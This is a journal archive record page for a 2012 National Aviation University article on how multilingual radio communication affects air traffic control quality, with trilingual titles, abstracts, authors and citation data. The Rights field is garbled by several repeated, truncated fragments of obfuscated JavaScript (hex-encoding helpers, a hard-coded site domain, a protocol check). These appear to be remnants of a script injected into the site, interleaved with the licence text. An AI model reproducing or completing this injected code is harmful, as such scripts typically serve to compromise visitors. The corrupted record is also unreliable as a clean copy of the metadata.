Record Details

IMPACT OF POLY-LINGUISTIC LOAD ON AIR TRAFFIC CONTROL AND MONITORING QUALITY

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title IMPACT OF POLY-LINGUISTIC LOAD ON AIR TRAFFIC CONTROL AND MONITORING QUALITY
ВЛИЯНИЕ ПОЛИЛИНГВИСТИЧЕСКОЙ НАГРУЗКИ НА КАЧЕСТВО КОНТУРА МОНИТОРИНГА И УПРАВЛЕНИЯ ВОЗДУШНЫМ ДВИЖЕНИЕМ
ВПЛИВ ПОЛІЛІНГВИЧНОГО НАВАНТАЖЕННЯ НА ЯКІСТЬ КОНТУРУ МОНІТОРИНГУ ТА КЕРУВАННЯ ПОВІТРЯНИМ РУХОМ
 
Creator Kharchenko, Volodymyr; Національний авіаційний університет
Chepizhenko, Valery; Національний авіаційний університет
Zaitsev, Yuriy; Національний авіаційний університет
 
Subject controller; dynamic flight status; linguistic interaction; operator model; poly-linguistic audio-acoustic channel; time delay
629.735.05:519.226
время опоздания; динамическая воздушная ситуация; диспетчер; модель оператора; полилингвистический речеслуховой канал; речевое взаимодействие
629.735.05:519.226
динамічна повітряна ситуація; диспетчер; мовна взаємодія; модель оператора; полілінгвичний мовнослуховий канал; час запізнення
629.735.05:519.226
 
Description  We have defined the structure and basic characteristics of the poly-linguistic audio-acoustic channel within the framework of controller – pilot communication, and set limits of poly-linguistic load impact on air traffic control.
 Рассмотрены результаты исследования речеслухового канала в контуре «диспетчер – пилот», неоднородность и возможность доминантности одной или нескольких языковых составляющих. Доказано, что на Украине, где применяются региональные языки при обязательном использовании авиационного профессионального английского языка, наблюдается полилингвистическая структура речеслухового канала в контуре «диспетчер - пилот». Отмечено, что взаимодействие составляющих, разный уровень их доминантности создает речеслуховой канал с отличными от моноканала характеристиками. Определены структура и характеристики полилингвистического речеслухового канала в контуре «диспетчер - пилот». Описаны направления уменьшения нагрузки на оперативную и долговременную память диспетчера. Обоснована степень влияния полилингвистической нагрузки на качество контура управления воздушным движением.
 Розглянуто результати дослідження мовнослухового каналу  в контурі «диспетчер – пілот», неоднорідність і можливість домінантності однієї або декількох мовних складових. Доведено, що в Україні, де вживаються регіональні мови, під час обов’язкового використання авіаційної фахової англійської мови спостерігається полілінгвична структура мовнослухового каналу в контурі «диспетчер – пілот». Зазначено, що взаємодія складових, різний рівень їх домінантності створює мовнослуховий канал з відмінними від моноканалу характеристиками. Визначено структуру та характеристики полілінгвичного мовнослухового каналу в контурі «диспетчер – пілот». Описано напрями зменшення навантаження на оперативну і довготривалу пам’ять диспетчера. Обґрунтовано ступінь впливу полілінгвичного навантаження на якість контура керування повітряним рухом.
 
Publisher National Aviation University
 
Contributor


 
Date 2012-09-20
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/2160
10.18372/2306-1472.51.2160
 
Source Proceedings of the National Aviation University; Том 51, № 2 (2012); 70-76
Вестник Национального авиационного университета; Том 51, № 2 (2012); 70-76
Вісник Національного Авіаційного Університету; Том 51, № 2 (2012); 70-76
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ